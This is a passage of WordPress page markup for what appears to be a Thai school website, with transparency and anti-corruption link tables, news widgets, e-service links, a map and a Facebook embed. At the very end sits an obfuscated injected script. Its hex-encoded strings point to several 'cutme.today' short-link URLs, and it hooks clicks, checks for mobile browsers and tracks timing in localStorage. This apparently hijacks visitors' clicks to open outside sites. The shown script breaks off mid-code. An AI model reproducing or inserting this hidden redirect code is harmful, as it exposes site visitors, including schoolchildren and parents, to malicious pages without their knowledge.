gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\" data-type=\"page\" data-id=\"1032\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1020\" data-type=\"page\" data-id=\"1020\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แผนการปฏิบัติการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1016\" data-type=\"page\" data-id=\"1016\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1036\" data-type=\"page\" data-id=\"1036\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1052\" data-type=\"page\" data-id=\"1052\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 